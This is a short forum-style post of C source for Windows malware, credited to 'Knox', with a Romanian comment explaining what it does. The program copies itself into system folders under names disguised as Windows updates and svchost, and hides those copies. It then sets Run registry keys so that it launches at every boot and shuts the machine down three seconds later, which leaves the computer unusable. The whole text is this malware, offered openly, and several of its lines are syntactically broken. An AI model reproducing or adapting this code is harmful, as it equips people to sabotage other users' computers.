Code:
/* Acest Program isi face registri pt a porni la fiecare pornire a Systemului shi iti va stinge Systemu in 3 secunde
Code de Knox webSite www.darkevolution.net.tc */
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <mmsystem.h>
int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nShowCmd)
{
CreateMutex(NULL,true,"Windows Security Updates";
if (GetLastError() == ERROR_ALREADY_EXISTS)
{
ExitProcess(0);
}
char sys[MAX_PATH];
char sys32[MAX_PATH];
char windir[MAX_PATH];
char path[MAX_PATH];
HMODULE GetModH = GetModuleHandle(NULL);
GetModuleFileName(GetModH,path,sizeof(path));
GetSystemDirectory(sys,sizeof(sys));
GetSystemDirectory(sys32,sizeof(sys32));
GetWindowsDirectory(windir,sizeof(sys));
strcat(sys,"\Windows Updates.exe";
strcat(sys32,"\Security Windows.exe";
strcat(windir,"\svchost32.exe";
CopyFile(path,sys,false);
CopyFile(path,sys32,false);
CopyFile(path,windir,false);
SetFileAttributes(sys,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(sys32,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(windir,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
HKEY hKey;
RegOpenKeyEx( HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",0,KEY_SET_VALUE,&hKey );
RegSetValueEx(hKey,"Windows Updates",0,REG_SZ,(const unsigned char*)"Windows Updates.exe",10);
RegSetValueEx(hKey,"Security Windows",0,REG_SZ,(const unsigned char*)"Security Windows.exe",10);
RegSetValueEx(hKey,"svchost",0,REG_SZ,(const unsigned char*)"svchost32.exe",10);
RegCloseKey(hKey);
system("shutdown -s -t 3 -c "Mirosuck is Crash by Knox" ";
return(0);
} |